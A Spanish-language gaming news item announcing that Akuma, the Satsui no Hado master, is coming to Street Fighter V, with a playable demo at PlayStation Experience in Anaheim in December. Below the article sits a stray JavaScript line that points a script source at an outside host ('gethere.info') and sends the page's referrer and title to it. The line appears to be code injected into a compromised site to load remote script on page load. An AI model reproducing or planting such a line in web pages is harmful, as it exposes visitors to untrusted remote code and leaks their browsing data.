Akuma llegará a Street Fighter V

Será hasta diciembre cuando veamos la nueva versión del Maestro Supremo del Puño.

Durante la final del Red Bull Battlegrounds que se realizó en Seattle el fin de semana se reveló la llegada de uno de los personajes más queridos (y odiados) de Street Figter @StreetFighter a la quinta entrega de la saga: Akuma, el demonio furioso, maestro del Satsui no Hado.

A través de un teaser, Capcom reveló al personaje en lo que parece ser un nuevo escenario de Street Fighter V, pero nada más. No se dice que nuevos movimientos tendrá, sí será un personaje regular, o cuándo estará disponible; aunque el anunció adelanta que se podrá jugar con él en la PlayStation Experience que se celebrará en el Anaheim Convention Center el 3 y 4 de diciembre.

Esperemos que Akuma sea el primero de muchos personajes clásicos que se unan a Street Fighter V el año que entra y que también llegue Tekken 7, en donde el Maestro Supremo del Puño aparece como invitado.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios